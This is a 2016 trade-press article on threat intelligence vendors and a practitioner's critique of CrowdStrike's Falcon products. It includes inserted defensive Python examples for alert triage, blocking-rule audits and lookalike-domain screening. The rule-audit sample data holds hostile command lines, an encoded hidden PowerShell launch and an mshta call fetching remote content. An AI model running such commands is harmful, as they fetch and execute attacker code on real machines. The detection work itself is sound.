


Senior Staff Writer

Threat Intelligence: The hot topic that makes people hesitant

Feb 28, 2016
Cybercrime, Security, Technology Industry

While the concept is great, actually discussing threat intelligence is a huge roadblock for some firms

[Image: mouth taped shut. Credit: Thinkstock]

SAN FRANCISCO – All this week, Salted Hash will be walking the halls of the RSA Conference in California. The running theme this week is threat intelligence: what it is and what it isn’t, the vendors who produce it, and the people who use it.

You’d think there would be an abundance of sources and source material given the topic, but that wasn’t the case at all.

For two weeks, Salted Hash attempted to locate security practitioners in various market segments to talk about threat intelligence, incident response, and how the two areas overlap. It wasn’t easy.

First, while most were willing to share their experiences, they wouldn’t or couldn’t share proof of those experiences, such as redacted screenshots of the product, or anything that would confirm they were a customer of a given vendor. It may seem extreme to require proof, but given the topic, we felt it was important to confirm first-hand knowledge of the product if possible, and avoid speculation.

Second, there was another segment of people willing to talk, but only in a general sense, because the threat intelligence vendor was holding non-disclosure agreements over their heads.

And that’s understandable. Most people aren’t allowed to talk to the media, and those who do often request that their name and employer be left out of the official record. But it’s strange that a threat intelligence vendor would have a non-disclosure agreement preventing a company from discussing perceived value or sharing information on the types of data they see.

We reached out to FireEye, one of the better-known and widely used threat intelligence vendors on the market, and asked if they used non-disclosure agreements to prevent customers from talking about the intelligence they get, its scope, or its value, etc.

A spokesperson got back to us a short time later, explaining that the intelligence products that they sell are proprietary “and customers agree in the terms and conditions not to disseminate the content beyond the organization (standard clause when purchasing content of any sort.) Talking about the scope, and perceived value, is certainly not prohibited.”

FireEye was one of the vendors where customers stated they couldn’t speak due to a non-disclosure agreement. As it turns out, FireEye customers are in fact free to talk about their experiences, they just can’t share content.

Perhaps the concept of what is and isn’t allowed with regard to open discussion isn’t being communicated properly by the vendor or the company. Then again, it could be a case where those in the trenches don’t know the limits of the non-disclosure agreements they cited when declining to talk. The final possibility as to why sourcing this week’s coverage was so taxing is that the organization just doesn’t want to discuss any aspect of their threat intelligence operations.

Maybe the entire notion of a vendor forcing non-disclosure agreements needs to be examined? Is it useful? Sure, keeping the sauce a secret has advantages, but how far is too far?

Rick Holland, when he was at Forrester (now the VP of Strategy for Digital Shadows), somewhat addressed this issue in a report on threat intelligence last year:

One hundred percent transparency isn’t realistic; providers naturally want to protect their sources and methods, but they must find a compromise that informs prospects and demonstrates differentiation.

In a crowded market, providers who keep everything about sources and methods private will be hard-pressed to make customer shortlists where they will be given the opportunity to validate their nebulous claims. Challenge vendors that provide little detail and suggest nondisclosure agreements; as a last resort, eliminate them from consideration.

As mentioned, FireEye customers referenced non-disclosure agreements when asked specifics. Even after being informed that FireEye doesn’t prohibit discussions about perceived value or scope, they remained firm on their stance.

As you’ll see this week, we did find some people who use threat intelligence daily who were willing to share information, their experiences, and thoughts on the topic.

Those we spoke to use a number of different vendors and products to get the job done. Later this week, we’ll look at an advisory from Radware and examine context, discuss threat intelligence automation, learn what it takes to start a threat intelligence program, and more.

Today’s story looks at how an incident response manager uses CrowdStrike’s Falcon platform.

Full Disclosure: I have recently learned that CSO Online, the parent publication of Salted Hash, has an existing business relationship with CrowdStrike.

I was not aware of this business relationship prior to starting my research on threat intelligence. Editorial and marketing have defined limits and do not overlap when it comes to news gathering operations, so there was no way for me to know of it beforehand. The existence of this business relationship was brought to my attention after my research into CrowdStrike came to an abrupt halt on February 23.

This abrupt halt was due to CrowdStrike contacting senior management at CSO Online. I don’t know the exact intent of the company in reaching out, but the contact with senior management alleged that I was refusing to give them a fair shake in what was shaping up to be a negative piece. This was confusing, because I had contacted the company twice in the previous week only to be met with silence.

Not only did I ask them to take part in the story on February 16; along with my questions, I informed them that I was speaking to a person working incident response in the finance sector, emailed them my story notes, the notes from a Falcon Host demo I watched, and informed them the demo notes would be part of the story, as they countered some of the source’s remarks.

I took these steps in order for them to have the ability to respond fully to the comments made by a customer. It was eight days before they returned with a brief statement on February 24, refusing to answer any of the questions asked. –Steve Ragan, Salted Hash

CrowdStrike’s statement is produced in full below. On page two of this post, you’ll find the interview with the source (incident response, finance) that their statement addresses.

“Without understanding who the customer is, and not understanding the role of this anonymous person, it is difficult to address any specifics of their implementation. Each customer has specific needs for their environment, which impacts how they implement and use our products.

“With a combination of Falcon Host, Falcon DNS and most importantly the data provided by Falcon Intelligence, we believe customers are in a position to dramatically reduce their exposure of a breach. We pride ourselves to provide value to our customers every day, and we continue to add new capabilities to our products as evidenced by our winter platform release, announced this week.”

CrowdStrike’s press release on the aforementioned product can be found here. While it wouldn’t have stopped our research or reporting, Salted Hash was not aware of any pre-RSA Conference product releases from the company.

An incident response manager shares his experiences:

The image on the left is Falcon Host, the endpoint protection offering from threat intelligence vendor CrowdStrike.

The Falcon platform was launched by CrowdStrike during the 2013 RSA Conference. The image was shared with Salted Hash by a practitioner working in the finance sector – we’ll call him Jason.

According to CrowdStrike:

“Falcon Host provides real-time visibility into adversary activity on every endpoint – everything is captured, nothing is missed. The lightweight Falcon sensor immediately detects attacks and protects your data without having to rely on ‘sweeps and scans’ of the environment.”

Jason’s image shows the adversary part of the portal; an actor from China is highlighted (Samurai Panda). According to the write-up, nothing is known about this actor other than it targets organizations in Japan, and spear phishing is the likely delivery method of any malicious payloads. There are a few C2 domains listed, but that’s it.

When asked for details, Jason said the threat actor profiles don’t really relate to his organization. It’s frustrating at times, he said, because the majority of the information on actors in the portal doesn’t pertain to the financial threat actors he’s seen. It’s as if those actors are considered less important by CrowdStrike than nation-state actors.

But the adversary portal isn’t a large part of his job; in fact he rarely needs to use it.

Just a typical day:

When an endpoint that’s being monitored by Falcon Host trips an alert, Jason gets an email, and thus his day begins.

The email contains a login link to the Falcon Host portal, as well as the hostname of the system that triggered the alert and a severity rating. Nothing more is offered, and no matter what the severity, the notice still arrives via email, so there’s no special alert for high-level events.

During a demo of Falcon Host, which Salted Hash registered for in order to verify Jason’s claims, it was confirmed during the Q&A section that email alerts could be somewhat customized and delivered to individuals or groups. There was no mention of separate alerting for high-severity events.

Often, he said, the alerts are useless – more false positives than anything. However, when a red team ran an engagement last year, Falcon Host did detect the red team’s actions, which was considered a win by the IR team. Otherwise, at least on his network, Falcon Host generates more noise than signal.
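As an added illustration (this is not code from the article’s source and not CrowdStrike’s), here is the kind of small triage layer an IR team can put in front of a single-channel alert stream like the one Jason describes: parse the e-mail, page on high severity regardless of history, and collapse repeated low-severity alerts from the same host so the inbox stops training people to ignore it. The article says only that each e-mail carries a login link, a hostname and a severity rating, so the message layout (Host:, Severity: and a link in the body), the sender address and the sample messages below are all constructed assumptions.

```python
"""Severity-aware routing and per-host suppression for endpoint alert e-mails.

Added example, not CrowdStrike code. The message layout (Host:, Severity: and a
portal link in the body) is an assumption; the article only says those three
items are present and that every severity arrives the same way.
"""
import email
import re

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}
PAGE_AT = "high"            # this severity and above goes to the on-call pager
SUPPRESS_WINDOW = 3600      # seconds; repeat sub-threshold alerts for one host are collapsed


def _mail(ts, host, severity):
    """Build a constructed alert e-mail in the assumed layout (sample data, not real mail)."""
    return ts, (
        "From: alerts@edr.example.invalid\n"
        "Subject: Endpoint alert\n"
        "\n"
        f"Host: {host}\n"
        f"Severity: {severity}\n"
        f"Login: https://portal.example.invalid/alerts/{ts}\n"
    )


SAMPLE_MAILS = [
    _mail(0, "WS-0101", "Low"),
    _mail(60, "WS-0101", "Low"),          # same host, inside the window: suppressed
    _mail(120, "WS-0202", "High"),        # paged regardless of history
    _mail(4000, "WS-0101", "Medium"),     # window expired: queued again
    (4100, "Subject: Endpoint alert\n\nno structured fields here\n"),  # malformed
]


def parse_alert(ts, raw):
    """Return (ts, host, severity, link) or None when a required field is missing or invalid."""
    body = email.message_from_string(raw).get_payload()
    if not isinstance(body, str):
        return None
    host = re.search(r"^Host:\s*(\S+)\s*$", body, re.M)
    sev = re.search(r"^Severity:\s*(\w+)\s*$", body, re.M)
    link = re.search(r"https?://\S+", body)
    if not (host and sev and link) or sev.group(1).lower() not in SEVERITY_RANK:
        return None
    return ts, host.group(1), sev.group(1).lower(), link.group(0)


class AlertRouter:
    def __init__(self, window=SUPPRESS_WINDOW):
        self.window = window
        self.last_queued = {}   # host -> ts of the last queued sub-threshold alert
        self.suppressed = {}    # host -> collapsed alert count, kept for the tuning review

    def route(self, alert):
        ts, host, severity, _ = alert
        if SEVERITY_RANK[severity] >= SEVERITY_RANK[PAGE_AT]:
            return "page"       # never suppressed, never just one more inbox entry
        last = self.last_queued.get(host)
        if last is not None and ts - last < self.window:
            self.suppressed[host] = self.suppressed.get(host, 0) + 1
            return "suppress"
        self.last_queued[host] = ts
        return "queue"


def process(mails):
    """Route each raw mail; returns ([(action, parsed_alert_or_None)], suppressed_counts)."""
    router = AlertRouter()
    decisions = []
    for ts, raw in mails:
        alert = parse_alert(ts, raw)
        if alert is None:
            decisions.append(("drop", None))   # malformed: log it; never silently ignore in production
            continue
        decisions.append((router.route(alert), alert))
    return decisions, router.suppressed
```

Suppression only applies below the paging threshold, and the per-host counts survive so the weekly tuning review can see which hosts were generating the noise rather than having it vanish.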

It was made clear during the Falcon Host demo that the product is there to stop hacking attempts. When tuned, it can detect a number of known methods and techniques, but it wasn’t clear from the demo how the unknowns are dealt with. Videos on YouTube about Falcon Host do address the topic, but Salted Hash can’t verify the rate of success.

The demo we witnessed used Metasploit and a basic attack technique (an ASLR bypass). In addition, the domain used in the demo was one associated with a known actor that has been covered extensively by CrowdStrike and others. In all fairness, there was no way the demo could fail.

Tuning and blocking:

Falcon Host, Jason explained, is more of a host-based intrusion detection system (HIDS) than anything else, unless you enable a feature that will stop an attack.

This function, however, isn’t activated in Jason’s environment, due to fears that the automation will break the business by killing legitimate processes. As it stands, Jason added, CrowdStrike’s Falcon platform is mostly a response tool, not threat intelligence.

During the demo, the automated blocking features were both enabled and disabled on Falcon Host. The same Metasploit-based attack was used each time. The known attack methods were detected without blocking enabled and alerts were raised.

However, the attack was still successful. When blocking was enabled, the known attack methods were halted and the demo attack was unsuccessful.

The image on the left shows the demo attack being detected. The redaction to the image was made by Salted Hash.

Based on the features shown during the demo, Jason’s comment that Falcon Host is a response tool and not threat intelligence is correct.

CrowdStrike collects their own threat intelligence (Falcon Intelligence) and uses it to drive the Falcon Platform.

One of the questions CrowdStrike didn’t answer when we reached out to them addressed how the company helped customers get past the hurdle of not trusting automated blocks and responses. It’s an important question considering it’s a key aspect of the platform.
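One way past that hurdle, shown here as an added example rather than anything CrowdStrike or Jason described, is to run the candidate blocking rules in record-only mode first: count what each rule would have killed over a stretch of known-good business activity (and over a red-team engagement, where one exists), and promote to prevention only the rules whose business hit count is acceptable. The rules, the process-start events and the host names below are constructed for illustration and are not CrowdStrike detection logic.

```python
"""Audit-mode evaluation of prevention rules before enabling automated blocking.

Added example; the rules and events are constructed for illustration and are
not CrowdStrike detection logic. Each event carries a ground-truth label taken
from change records (business) or the red-team report (redteam).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str
    label: str     # "business" (known-good activity) or "redteam"


OFFICE = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe"}


def office_spawns_shell(e):
    return e.parent in OFFICE and e.image in SHELLS


def encoded_powershell(e):
    c = e.cmdline.lower()
    return e.image == "powershell.exe" and ("-enc " in c or "-encodedcommand" in c)


def mshta_remote_content(e):
    return e.image == "mshta.exe" and "http" in e.cmdline.lower()


def any_powershell(e):
    # Deliberately over-broad, to show a rule that must stay detect-only.
    return e.image == "powershell.exe"


RULES = {
    "office_spawns_shell": office_spawns_shell,
    "encoded_powershell": encoded_powershell,
    "mshta_remote_content": mshta_remote_content,
    "any_powershell": any_powershell,
}

# Constructed events; a real audit window holds thousands of these.
EVENTS = [
    ProcEvent("WS-1", "winword.exe", "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgAIAAo", "redteam"),
    ProcEvent("WS-2", "explorer.exe", "powershell.exe", r"powershell -File C:\scripts\inventory.ps1", "business"),
    ProcEvent("SRV-1", "services.exe", "powershell.exe", r"powershell -ExecutionPolicy Bypass -File D:\jobs\backup.ps1", "business"),
    ProcEvent("WS-3", "outlook.exe", "cmd.exe", "cmd /c whoami /all", "redteam"),
    ProcEvent("WS-2", "explorer.exe", "mshta.exe", "mshta http://198.51.100.7/p.hta", "redteam"),
    ProcEvent("WS-4", "excel.exe", "cmd.exe", r"cmd /c C:\finance\export_gl.bat", "business"),   # legitimate macro
    ProcEvent("WS-5", "explorer.exe", "winword.exe", "winword /n", "business"),
]


def audit(events, rules, max_business_hits=0):
    """Per rule: would-block counts by label plus a prevent/detect recommendation."""
    report = {}
    for name, rule in rules.items():
        hits = {"business": 0, "redteam": 0}
        for e in events:
            if rule(e):
                hits[e.label] += 1
        ok_to_prevent = hits["business"] <= max_business_hits and hits["redteam"] > 0
        hits["recommend"] = "prevent" if ok_to_prevent else "detect"
        report[name] = hits
    return report
```

On this sample the encoded-PowerShell and remote-mshta rules are clean and caught red-team activity, so they can be promoted; the Office-spawns-shell rule would have killed a finance macro and stays in detect mode until an exclusion is written, and the catch-all PowerShell rule should never block. Promotion to a pilot group of hosts, not the whole fleet, is the sensible next step.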

Falcon DNS:

Another CrowdStrike offering, Falcon DNS, did detect malicious traffic from malware to a command-and-control (C2) server. Once again though, Jason explained, much of that traffic is also noise by way of false positives, so one tends to get inured to the alerts.

Once in a blue moon, Jason said, he will get an email detailing domains that are likely being registered for squatting or phishing. While that’s useful, those emails didn’t catch the other domains he discovered himself, so it’s hit or miss.
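The domains Jason found on his own are the kind a team can screen for itself, so here, as an added example that is not CrowdStrike’s Falcon DNS logic, is a lookalike-domain check of the sort a practitioner runs over a registration feed: generate single-edit variants of the brand label (omission, transposition, doubled character, hyphen, ASCII homoglyph), then flag TLD swaps, typo matches and longer labels that embed the brand. The brand domain and the “newly registered” feed are constructed for the example.

```python
"""Screening newly registered domains for lookalikes of a monitored brand.

Added example; not CrowdStrike's Falcon DNS logic. The brand domain, the
variant generators and the registration feed are all constructed.
"""

HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "rn": "m", "m": "rn"}


def typo_variants(label):
    """Single-edit lookalikes of a second-level label: omission, adjacent
    transposition, doubled character, inserted hyphen, ASCII homoglyph swap."""
    out = set()
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:])            # omission
        out.add(label[:i] + label[i] + label[i:])     # repetition
    for i in range(len(label) - 1):
        out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transposition
    for i in range(1, len(label)):
        out.add(label[:i] + "-" + label[i:])          # hyphenation
    for src, dst in HOMOGLYPHS.items():
        idx = label.find(src)
        while idx != -1:
            out.add(label[:idx] + dst + label[idx + len(src):])
            idx = label.find(src, idx + 1)
    out.discard(label)
    return out


def split_domain(domain):
    """Split 'sub.label.tld' into (registrable label, tld). Assumes a one-part TLD."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) < 2:
        return None, None
    return parts[-2], parts[-1]


def classify(domain, brand):
    """Return why `domain` resembles `brand` ('tld-swap', 'typo', 'brand-embedded') or None."""
    brand_label, brand_tld = split_domain(brand)
    label, tld = split_domain(domain)
    if label is None or (label == brand_label and tld == brand_tld):
        return None                                  # the brand itself, or unparseable
    if label == brand_label:
        return "tld-swap"
    if label in typo_variants(brand_label):
        return "typo"
    if brand_label in label:
        return "brand-embedded"
    return None


# Constructed sample feed of "newly registered" domains (not real data).
NEW_DOMAINS = [
    "examplebank.com",                # the monitored brand itself
    "exarnplebank.com",               # rn -> m homoglyph
    "examplebnak.com",                # transposition
    "examp1ebank.com",                # l -> 1
    "examplebank.co",                 # TLD swap
    "login.examplebank.co",           # TLD swap behind a subdomain
    "examplebank-secure-login.net",   # brand embedded in a longer label
    "unrelatedshop.com",
]


def screen(domains, brand):
    """Map each flagged domain to the reason it was flagged."""
    flagged = {}
    for d in domains:
        reason = classify(d, brand)
        if reason:
            flagged[d] = reason
    return flagged
```

Two caveats a practitioner should know: this handles ASCII only, so IDN homoglyphs (xn-- labels) need the punycode decoded and a Unicode confusables table, and multi-part TLDs such as .co.uk need a public-suffix list rather than the one-part split used here. The feed itself would normally come from certificate transparency logs or zone-file diffs.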

Play the hand you’re dealt:

Jason’s point, he later added, is that while CrowdStrike is considered a threat intelligence vendor, the intelligence their products provide to his organization is of little value. But it’s what they have, so they’ll take what they can get.

Again, considering what we learned during the demo, even if automated blocking isn’t enabled, Falcon Host will still spot most known attacks and raise the proper alerts. However, it was abundantly clear from the demo that Falcon Host’s power comes from its automation, which could be a problem if organizations don’t trust it.

Do you have a different experience with CrowdStrike? If so, feel free to comment below with your thoughts or email them.

The issue with false positives, too many alerts, and a lack of clear context will come up several times this week. It’s one of the largest sources of pain for practitioners working with threat intelligence feeds and platforms.